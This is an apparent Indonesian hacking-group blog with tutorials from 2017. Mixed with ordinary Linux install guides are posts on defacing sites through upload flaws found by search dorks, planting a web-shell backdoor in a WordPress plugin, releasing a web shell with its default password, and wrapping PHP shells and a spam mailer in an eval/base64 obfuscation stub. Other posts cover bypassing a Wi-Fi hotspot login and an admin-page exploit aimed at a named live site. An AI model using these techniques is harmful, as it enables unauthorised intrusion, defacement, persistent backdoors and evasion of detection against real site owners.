Thanks For Support Us Don't Forget Us In Your Heart And Your Mind

Copyright © Sorry We're Closed | Published By Gooyaabi Templates | Powered By Blogger
Design by WebSuccessAgency | Blogger Theme by NewBloggerThemes.com | BTheme.net

Visitor Counter

Trustmark

Facebook


Selamat Datang Di Bagian Intelligence Gathering Garuda Security Hacker

Dengan Mengakses Laman Ini Berarti Anda Setuju Bahwa Setiap Dampak Dan Resiko Penyalahgunaan Konten Ditanggung Oleh Anda Sendiri

Informasi di Tiap Laman Akan Terus diupdate secara berkala

Friday, October 6, 2017

Cara Hack Wifi.id Tanpa Login Dan Akun 100% Work

Simak sajah vidionya di bawah ini gan , jangan manja pengen di suapin mulu heheh
==============================
1. Buka login Page Wifi.id
==============================
2. Copy URLnya
==============================
3. Masukan Ke Software
==============================
4 Klik Konek / Login
==============================
5. Sukses
==============================
100% Konek, jangan lupa subscribe :)
==============================
By : EsevenB
http://zonaundergroundindonesia.blogspot.co.id/2017/09/cara-login-wifii-id-gratis-dengan-loginner.html
jangan lupa subscribe juga channel nya, ada banyak tutorial lain juga
channel : 4Sekawan A.k.A Channel EsevenB


Garuda Security Hacker Official Team



Official Website Portal : Garuda Security Hacker | Official Website Portal
Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

DEFACE METODE PHP FILE MANAGER UPLOAD SHELL


Setelah sekian lama saya tidak melakukan defacing, iseng iseng saya cari exploit dan langsung saya share sajah buat kalian yang ingin belajar deface. method php file manager upload shell
Note : Maaf Suaaranya Terbata Bata
Jangan Lupa Subscribe Juga Channelnya
By : E7B_404
From : Channel 4Sekawan
Team : Garuda Security Hacker



Garuda Security Hacker Official Team



Official Website Portal : Garuda Security Hacker | Official Website Portal
Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Sunday, August 27, 2017

Deface Metode IP , Port dan Protocol Forward Di Windows

 Hello gue E7B_404 dah lama gak bikin tutor dan kali ini gue ketitipan amanat baut bikin tutorial
Deface Metode IP Forwading, Port dan Protocol Forward Di Windows, buat klian pecinta linux silkn baca (Deface Metode IP Forwading, Port dan Protocol Forward Di Linux)

 Lu download dulu Ngrok nya buat pesugihan kali ini  silakan download di https://ngrok.com/download kalo udah download lu exrta filenya dimana ajah terserah lu. gue extra di  D ,
kalu udah di exrta bukan CMD via admin, dan lu pergi ke tempat dimna lu naro ngrok.
Selanjutnya jalanin dulu XAMPP / Localhost, centang cukup pada apache sajah gan


Taro file deface lu di localhost dulu dengan nama index.html biar nanti indenya ke tebas, sekarang kalo udah lu ketik ngrok http 80 .

Selanjutnya tekan enter dan biarkan hingga connecting, kalo udah dan berhasil muncul ke gini gan


Lu copy yang gue blo, dan selanjutnya lu buka link tersebut di adres bar dan taraaaa

Cukup sekian tutor dari kami dan thanks buat Fay :) :* cker Official Team


Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Friday, August 25, 2017

Deface dengan Metode IP, Port dan Protocol Forward

Deface dengan Metode IP, Port dan Protocol Forward


_Tuan2Fay_ | Garuda Security Hacker ~ Sebelumnya maaf buat para defacer pro, soalnya kali ini gw bikin tutorial Deface,, ya bisa di bilang ini fake deface, sama kek DNS Afraid yg sempat booming waktu itu. gw bikin tutorial ini bukan buat spam setoran mirror defacement. ini cuma pembelajaran tentang "Forwarding IP, Port dan Protocol"
Ok langsung aja dah kita ke materi

Bahan-Bahan :

Bukan bacol mz -_-

1. Apache Server ( buat si Penguin ) kalo si jendela pake XAMPP

2. Ngrok

3. Script Deface.

Step by Step :

1. Kalo belum ada Apache Server,, silahkan di Install dlu ya :) (cari tutorial di gugel)

2. Register Ngrok => Ngrok

Deface dengan Metode IP, Port dan Protocol Forward

tinggal ikutin aja step-step registernya

3. Setelah itu lu login ke akun ngrok !!

4. Download ngrok nya sesuai kebutuhan.. (ane pake yg buat Linux 32bit)

Deface dengan Metode IP, Port dan Protocol Forward


5. Selesai download,, tinggal di unzip aja Ngroknya.. (udah tau kan ? klo blm cari di gugel aja)

6. Beres di unzip, kita pindahin dlu Ngroknya biar gampang di panggilnya
buka terminal.
# sudo su
# mv ngrok /usr/bin/

7. Kita install authtoken ngroknya dlu.
# ngrok authtoken token_ente

Deface dengan Metode IP, Port dan Protocol Forward


Deface dengan Metode IP, Port dan Protocol Forward

8. Beres install authtoken, kita start service apache servernya
buka terminal -> login root (kalo udh kaga usah login lagi kntl)
# service apache2 start

9. Baru kita start ngroknya,,
# ngrok http 80
Note : 80 adalah port default apache

10 . Kalo sukses bakalan kek gambar ↓

11. Kita akses domainnya, yg itu tuh : http://blablabla.ngrok.io

Deface dengan Metode IP, Port dan Protocol Forward

Lohh dmna depesnya ?? Ngotak dikit kntl!!

12. Copy script deface kamu ke /var/www/html/ ← Direktori web server apache

13. Tinggal di akses dah,, http://blablabla.ngrok.io/script.ext

Deface dengan Metode IP, Port dan Protocol Forward

14. Terserah lu mau di apain..

kalo kaga ngerti tinggal komen aja ya kntl !! atau chat ke FP GSH
Note :
Tutorial buat pengguna jendela bajakan menyusul..



Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Mencoba memperbaiki Error 1935 HRESULT Pada windows 7 sewaktu menginstall software




Yo brad kembali sama saya anak terganteng yaitu Cr4byP4tty kali ini saya akan memberikan solusi apabila anda Ketika meng-install suatu software ke dalam sistem operasi Microsoft Windows 7 Liat gambar paling luhur :v tiba-tiba keluar peringatan error keluar saat proses installasi sedang berlangsung atau bahkan ketika proses installasi tinggal beberapa persen lagi, peringatan error keluar yang memaksa proses intallasi digagalkan (rollback) secara otomatis tanpa bisa di tahan.Dari pengalaman saya ini disebabkan filesystem transaction log milik Windows korup gw kira windows gua udah gabisa nge install suatu softare lagi wkwkwk, Diantara sekian peringatan error yang ada keluar diantaranya Error 1935: Terjadi kesalahan saat menginsitall komponen rakitan {97F81AF1-0E47-DC99-A01F-C88389A1E18E}. HRESULT: 0x800736B3 atau Error 1935 HRESULT: {97F81AF1-0E47-DC99-A01F-C88389A1E18E} 0x800736B3 atau masih banyak lagi variasi peringatan error 1935, lalu bagaimana mengatasi masalah tersebut?

Pertama buka CMD terlebih dahulu :v

lalu masukan kode seperti ini "fsutil resource setautoreset true c:\" (Tanpa tanda petik ya guys :v)
lalu ENTER
Sampai ada keluar bacaan "The operation completed successfuly"

Sudah begitu RESTART Komputer anda dan jalankan kembali installer nya,

SEKIAN DARI SAYA Semoga Berhasil :P



Thursday, August 24, 2017

Tutorial Tanam Shell Backdoor di WordPress tanpa merusak Plugins dan Themes

Tutorial Tanam Shell Backdoor di WordPress tanpa merusak Plugins dan Themes

Tutorial Tanam Shell Backdoor di WordPress tanpa merusak Plugins dan Themes

_Tuan2Fay_ | Garuda Security Hacker ~ heii kuyy,, apa kabar ?? masih depes2an ?? hati2 yee,, ntar tercyduck :v. ok masuk ke topik.
Biasanya para depeser kalau tanam shell di wordpress pasti ngereplace source code plugin/theme, sebaiknya jgn terlalu brutal lah klo depes itu kasian admin -_- apa lagi yg di depes website lokal. main lah sedkit lebih rapih :) makanya gw bikin tutorial ini,,

Bahan-Bahan :

bukan bahan buat lu ngocok koplak :v
1. Plugin WordPress
Plugin nya bisa di donlot di => Sini
Cari aja yg sizenya kecil

2. Shell Backdoor
kalo belum punya bisa pake => x48x Web Shell

Step by Step :

1. Masukin dlu shell nya ke Archive plugins..

Tutorial Tanam Shell Backdoor di WordPress tanpa merusak Plugins dan Themes

2. Login WordPress dlu..

3. Setelah login lanjut ke menu Plugins -> Add New -> Upload Plugin

Tutorial Tanam Shell Backdoor di WordPress tanpa merusak Plugins dan Themes

4. Upload File Plugin yg tadi dah di susupi shell backdoor
5. Kalo Sukses hasilnya begini ↓

Tutorial Tanam Shell Backdoor di WordPress tanpa merusak Plugins dan Themes

6. Tinggal di Panggil dah plugin yg dah lu upload terus akses shellnya
contoh :
site.crot/wp-content/plugins/namaplugins/shellkamu.php

Tutorial Tanam Shell Backdoor di WordPress tanpa merusak Plugins dan Themes

Shell gw namanya k3.php :)

Done,, simple kan.. kaga ada plugins yg di rusak.. supaya kaga nyusahin webmaster


Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Thursday, August 17, 2017

[SHELL] x48x Web Shell

[SHELL] x48x Web Shell

[SHELL] x48x Web Shell


_Tuan2Fay_ | blog.garudasecurityhacker.org - setelah sebelumnya ane ngerilis mini shell, skrng ane rilis versi anunya (entahlah :v).
pada dasarnya shell ini cuma mengambil function dan tool dari shell yg udah ada sebelumnya,, ini cuma kerjaan ane saat iseng2 aja :v jadi mohon maaf klo tercyduck banyak kekurangannya :( :(

Fitur :

Fitur jg ga banyak2 amat,, ane masukin yg sering di pake sama orang2 aja :v
sama ane modif dikit fitur login nya..
Untuk lebih detail nya cek sendiri aja ya :p

Tampilan :

[SHELL] x48x Web Shell
Sebelum Tercyduck

[SHELL] x48x Web Shell
Sesudah Tercyduck

[SHELL] x48x Web Shell
Sesudah Tercyduck dan Login

Note :
  • Buat munculin form loginnya tinggal di tambahin ?ez=login contoh : x48x.php?ez=login
  • Default passwordnya : melodynl (bisa di ganti sendiri)

Link : Pasted.co



Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Friday, July 28, 2017

Tutorial Instalasi Websploit Framework di Ubuntu/Debian

Tutorial Instalasi Websploit Framework di Ubuntu/Debian


_Tuan2Fay_ | blog.garudasecurityhacker.org - kali ini gw bakalan kasih tutorial singkat dan simple,, mungkin ga berguna juga :v yoshh,, simak aja tutorial nya

Step by Step :

1. Buka terminal,, terus login root

# sudo su


2. Download dlu Websploit Frameworknya,,

# wget http://files.melodynl48.ga/WebSploit-Framework-3.0.0.tar.gz

tenang kok gak di campur apa2, ane cuma buat mirror sendiri supaya direct link


3. kita ekstrak file nya.

# tar xvf WebSploit-Framework-3.0.0.tar.gz


4. Sebelum install Websploit kita install dlu scapy

# apt-get install scapy


5. Lanjut install websploitnya

# cd websploit/
# ./install.sh

6. Done tinggal dibuka dah

# websploit

Dah gitu aja,, kaga pake gambar :v mudah mudahan bermanfaat.
kalo bingung atau mau tanya sesuatu silahkan Chat ke FP,, klo di komentar lama respon nya :v karena yg ngurus blog cuma ber3



Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Tutorial Encode Script PHP

Tutorial Encode Script PHP

Garuda Security Hacker


_Tuan2Fay_ | blog.garudasecurityhacker.org -
yoshh apakabar,, sorry pake foto oshi soalnya gw bingung mau pake gambar apalagi biar menarik :v,, sesuai judul gw bakalan ngasih tutorial cara Encode Script PHP, berlaku juga Webshell yg di pake buat depes web,, kenapa di encode ? supaya gak mudah di Recode sama orng,, kalau pun mau ngeRecode ya harus di Decode dlu,, itu pun kalo berhasil. Ok langsung aja eue tutorial nya,,

Bahan Bahan :

1. Script PHP yang mau di Encode
2. Tool buat ngeEncode ( http://scriptencode.net/ )
3. Editor Text (Notepad, Gedit, Bluefish, Nano, dll)

Step by Step :

1. Baca Bismillah dlu kuy,,

2. Buka url Tool buat ngeEncode (link di atas)

3. Buka Script yg mau di encode
di sini saya pake script Mailer spam karya Lyonc (ntar script nya di post ke sini)
 
4. Copy code nya tapi jagan pake <?php (yg di atas) sama ?> (yang paling bawah) liat gambar biar rada seger


Tutorial Encode Script PHP

tapi kenapa saya gak bawa $auth_pass = 'md5 hash'; nya ? sengaja biar bisa di ganti2

5. Copy ke tool nya,, terus kita pilih type yg "base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64" aja,, terus langsung klik Encode

Tutorial Encode Script PHP

6. Kita beralih ke text editor/notepad dll, bikin file baru,, lau copy kode di bawah.
<?php

$file = 'isi dengan kode hasil encode';
eval(base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode($file)))))));
 

?>

save dengan format .php

Note : Kalo Script yang kalian encode ada session loginnya,, password yg ga di encode bisa di taro di atas $file, contoh

$auth_pass = 'md5 hash';
$file = 'hasil encode';

 itu pun kalo memang ada atau sengaja ga ikut di encode,

segitu dlu aja yah,, cape ngetik + duduk lama2, mohon maaf klo sulit di pahami atau kurang detail tutorialnya,, kalau mau bertanya bisa komen di bawah atau chat ke FP kami kuy,,


Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Wednesday, July 26, 2017

Tutorial Instalasi TeamViewer12 di Ubuntu

Tutorial Instalasi TeamViewer12 di Ubuntu

Tutorial Instalasi TeamViewer12 di Ubuntu


_Tuan2Fay_ | blog.garudasecurityhacker.org - Heii sorry baru update lagi neh,, karena gw sibuk maen game dan tidur saat liburan :v.. oh yaa blm lebaran neh -_- "Minal 'Aidzin Wal Faizin" ya mohon maaf kalo gw terlalu menawan dan menarik perhatian kaum hawa (Ekspetasi).
Kali ini gw bakal kasih tutorial tentang linux lagi.. langsung ajalah ya ? iye kaga?

Step by Step :

1. Donlot dlu TeamViewer nya
Link : https://www.teamviewer.com/id/download/linux/

2. Buka terminal dlu,, kita install kebutuhan jasmani dan rohani si TeamViewer xD yaitu libjpeg62
# sudo apt-get update
# sudo apt-get install libjpeg62

Tutorial Instalasi TeamViewer12 di Ubuntu
Distro Backbox

3. Klo dah beres baru kita install teamviewernya.
# sudo gdebi /home/user/Downloads/namafile.deb
Note : kalo blm ada gdebi ya instal aja dlu # sudo apt-get install gdebi

Tutorial Instalasi TeamViewer12 di Ubuntu


4. Kalo dah beres dan kaga ada error,, lu buka TeamViewernya.
Accept aja ya,,

Tutorial Instalasi TeamViewer12 di Ubuntu

 5. Done :)

Tutorial Instalasi TeamViewer12 di Ubuntu

Ya semoga artikel ga berguna ini bisa bermanfaat buat yg beruntung :)
Kalo ada error atau bingung silahkan tanyain lewat komentar,, kalo mau fast respon langsung aja kirim pesan ke kantor polisi terdekat atau ke Fanpage official kami :)

Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Saturday, July 22, 2017

Deface Metode PDW File Browser


Hallo nihh tutorial buat lu pade yang suka deface :V, bisa upload shell juga :V :V buat yang ganteng kaya gue.
langsung sajah
dork : "PDW File Browser"
nanti kalau vuln ada uplload di sebelah kirin atas, klik ajah nanti ada form upload dan upload shell lu gan.
nah kalau udah di upload cari file lu dekatin kursor nanti akan uncul akses shell / file lu gan , seperti punya ane.

Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Friday, July 21, 2017

Cara Unlock Modem Bolt Agar Support All Simcard



Hallo sobat , gimana dah coli dulu karena tutorial ini wajib coli gan buat yang belum silakan coli pake amplas motor :V,
oke kali ini gue akan share cara Unlock Modem Bolt jadi lu bisa pake modem bolt dengan semua kartu bukan hanya bolt dengan cara di unclock melalu software / fimware, kali ini gue gak pake gambar jadi lu harus jago ngebayangin bokep dulu biar ngerti wowkowkok.

pertama lu harus ada fimware / software Huawei Flasher, (untuk softwarenya silakan chat fp ajah) gk smpet upload ke google drive. lagi lelet jaringan soalnya postnya smbil download Jav.
  1. Sebelumnya Anda sudah harus mempersiapkan firmware khusus model Huawei E5372s. Selanjutnya jalankan firmware tersebut dengan klik kanan > “Run as administrator”.
  1. Akan muncul kotak dialog Update Wizard – Firmware. Anda hanya perlu mencentang kalimat “A accept the agreement”, setelah itu klik “Start”.
  1. Nantinya frimware tersebut akan mencari dan mendeteksi modem Bolt Anda. Tandanya akan muncul loading updating untuk melakukan pembaharuan. Jika sudah selesai, akan muncul pemberitahuan “Update successfully”.
  1. Sampai sini modem Anda sudah dalam mode unlock. Selanjutnya Anda hanya perlu mencobanya dengan menggunakan kartu operator lain. Selain itu, lakukan test speed hingga Anda bisa memastikan bahwa kecepatan dari modem Bolt Huawei E5372s tersebut tidak dibatasi.
  1. Cara Unlock Modem Bolt 4G Huawei E5372s ini juga bisa digunakan untuk versi Huawei E5372s lainnya, seperti Bolt Max dan Bolt Slim.
nah itulah caranya sob, lu bingun ? slakan chat fp kami buat pencerahaan kakek sugiono.
dan kalo saat installl terdapat error 17 itu beda kasus nanti gue upload di next post.
ngantuk post jam segini -_-.

Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Tuesday, June 13, 2017

Deface Metode Admin Poor Password Developed By Native Sparrow


Fans :*
hallo dah lama ngak share tutorial deface ane E7B_404 masih ingat ea :) .. ane share poc admin poor password  Developed By Native Sparrow sebenarnya males share tutorial tapi karena bingunmau ngpain ya share ajah nih tutorial sederhana.
Dork : intext:"Developed By Native Sparrow"
cari targetnya yang perawan, tenang saya belum abisin, cuma test satu doang buat bikin tutorial
kal dah nemu target masukin exploit
site.com/admin/viewevent.php
sorry ngak pake gambar, pasti dah jago jago lah sekarang mah :V
Live demo nih buat kalian :

http://www.velammalbodhionline.com  masukin exploit http://www.velammalbodhionline.com/admin/viewevent.php
cari tempat upload atau buat add news / event deh .
fb ane kalau mau tanya tanya : https://cpaoffer.info/a/downloads
ok sekian tutorial sederhana dari gue. cewenya cakep tuh yang beri FS :V
Greetz to : Yukinoshita 47 | _Tuan2Fay_ | Snooze | OutrageousEngkus | E7B_404 | LuckNut | Cr4bbyP4tty | ShadowHearts | CyberGhost.17 | Lyonc | EvilClown | Mr_Viruzer#29 | Loyo-ID | Fazlast | DarkTerrorizt | And All Member of Garuda Security Hacker

Saturday, May 27, 2017

Cara Repack/Backup Package Yang Telah Terinstal di Linux (Ubuntu)

Cara Repack/Backup Package Yang Telah Terinstal di Linux (Ubuntu)

Cara Repack/Backup Package Yang Telah Terinstal di Linux (Ubuntu)

_Tuan2Fay_ | Garuda Security Hacker ~ Yosshh gw posting lg tutorial,, masih seputar Linux, semoga kalian kaga bosen baca postingan yg kaga jelas ini ^_^ , langsung aja eue tutorialnya..

Step by Step

1. Buka terminal angkot kalian ^_^

2. Kita install dlu dpkg repack,, buat ngerepack package yang telah di instal jadi file .deb
# sudo apt-get install dpkg-repack fakeroot

Cara Repack/Backup Package Yang Telah Terinstal di Linux (Ubuntu)


3. Kalo dah beres instalnya kita buat direktori dlu buat naro file hasil repack nya
# mkdir SerahLo

Cara Repack/Backup Package Yang Telah Terinstal di Linux (Ubuntu)


4. Masuk dlu ke direktori yang barusan ente bikin..
# cd namadirektori/

5. Tinggal di repack aja package nya,, misalnya ane ngerepack mdk3
# sudo dpkg-repack namapackage
# sudo dpkg-repack mdk3

Cara Repack/Backup Package Yang Telah Terinstal di Linux (Ubuntu)

6. Tuh dah beres,, tinggal di cek aja.. simpel kan ??

Ohh iyaa,, mohon maaf klo ane bakal jarang post,, ya palingan seminggu 1x lah,, biar blog nya tetep hidup.. ini gw jg di minta ama tmn buat bikin postingan tentang linux,, lah gw bingung mau apa materi nya,, yaudahlah yang simpel aja :v

Marhaban ya Ramadhan

Greetz to : Yukinoshita 47 | _Tuan2Fay_ | Snooze | OutrageousEngkus | TM_404 | E7B_404 | LuckNut | Cr4bbyP4tty | ShadowHearts | CyberGhost.17 | Lyonc | EvilClown | Mr.Spongebob | D34D_SL33P | | Mr.HzA404EsL | Mr_Viruzer#29 | Loyo-ID | Fazlast | DarkTerrorizt | And All Member of Garuda Security Hacker

Friday, May 26, 2017

Cara Instal Spotify Di Linux (Ubuntu)

Cara Instal Spotify Di Linux (Ubuntu)

Cara Instal Spotify Di Linux (Ubuntu)


_Tuan2Fay_ | Garuda Security Hacker - yosshh balik lagi ama gw orng biasa yang mnecoba sesuatu yang tidak biasa :v ,, siapa bilang Linux itu ribet ?? atau linux kaga user friendly ,, nah kli ini gw bakal ngasih tutorial "Cara Instal Spotify Di Linux (Ubuntu)" , klo tutorial kemaren gw pke os BackBox sekarang gw pake ZorinOS,, supaya cepet move on dari dunia Pentesting :v.. ok langsung aja loncat ke tutorial nya..

Step by Step

1. Download lu Package Spotify Client nya :)
32 Bit => Direct Link
64 Bit => Direct Link

# sudo wget link
# sudo wget http://repository.spotify.com/pool/non-free/s/spotify-client/spotify-client_1.0.55.487.g256699aa-16_i386.deb

Cara Instal Spotify Di Linux (Ubuntu)

2. Pindah direktori ke tempat hasil downloadan nya,,

3. lanjut install aja dah

# dpkg -i namapackage.deb
# dpkg -i spotify-client_1.0.55.487.g256699aa-16_i386.deb


Cara Instal Spotify Di Linux (Ubuntu)

4. Nah klo dah selesai install tinggal buka aja dah,, bisa cek di menu atau buka lewat terminal :)

Cara Instal Spotify Di Linux (Ubuntu)
Cara Instal Spotify Di Linux (Ubuntu)

5. Done :)

Gimana ?? simple kan,, kaga ribet kan ?? User Friendly kan ??
ohh iyaa,, buat kalian yang berdomisili di Bogor,, terus pengen migrasi ke Linux tp bingung gmna cara nya,, bisa kontak saya aja langsung tuan2fayofficial@gmail.com






Greetz to : Yukinoshita 47 | _Tuan2Fay_ | Snooze | OutrageousEngkus | TM_404 | E7B_404 | LuckNut | Cr4bbyP4tty | ShadowHearts | CyberGhost.17 | Lyonc | EvilClown | Mr.Spongebob | D34D_SL33P | | Mr.HzA404EsL | Mr_Viruzer#29 | Loyo-ID | Fazlast | DarkTerrorizt | And All Member of Garuda Security Hacker

Facebook

Followers

Cari Konten Blog

Motivasi Kami Sepanjang Masa

Motivasi Kami Sepanjang Masa

Featured

Popular Posts